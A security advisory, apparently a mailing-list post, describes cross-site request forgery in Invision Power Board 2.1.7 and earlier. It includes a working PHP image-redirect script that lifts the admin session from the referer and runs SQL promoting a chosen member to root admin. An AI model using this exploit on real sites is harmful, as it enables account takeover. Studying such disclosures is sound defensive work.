IPB-2.1.7.txt

`Invision Power Board Multiple Vulnerabilities  
Affects: IPB <=2.1.7  
Risk: High  
  
An attack exists where an admin can be redirected and  
forced to execute SQL commands through IPB's SQL  
Toolbox.  
  
The following requirements must be met for this attack  
to take place:  
- The database table prefix must be known  
- The admin must have access to the SQL Toolbox (any  
"root admin")  
- The admin must have images and referers turned on in  
their browser, and their browser must follow Location  
headers (default behaviour for most browsers)  
- The admin must view a malicious script as an image  
in their browser.  
  
This attack works invisibly to the admin because only  
the image is redirected, not the page.  
  
  
1st method:  
In this method, any user can force the admin to  
execute SQL commands.  
  
1. A user sets their avatar to the malicious script's  
address  
2. The admin looks up the user's account in the Admin  
CP  
3. The user's avatar is shown and the admin is  
redirected....  
  
  
2nd method:  
A restricted admin can add any HTML to a forum's  
description(including javascript).  
  
1. A restricted admin adds the malicious script as an  
image to a forum's description.  
2. Upon going to the "Manage Forums" link in Admin CP,  
an unrestricted admin will be redirected and the SQL  
will be executed.  
  
  
Example malicious image script:  
<?php  
  
//The member id to promote to root admin  
$mid = 145;  
  
//The database prefix (usually "ibf_")  
$prefix = "ibf_";  
  
if (preg_match('/(.*adsess=[\\w]{32})/',  
$_SERVER['HTTP_REFERER'], $admin_loc) and $mid)  
{  
header("Location:  
".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+{$prefix}members+SET+mgroup%3D4+where+id%3D{$mid}+LIMIT+1");  
}  
  
?>  
  
__________________________________________________  
Do You Yahoo!?  
Tired of spam? Yahoo! Mail has the best spam protection around   
http://mail.yahoo.com   
`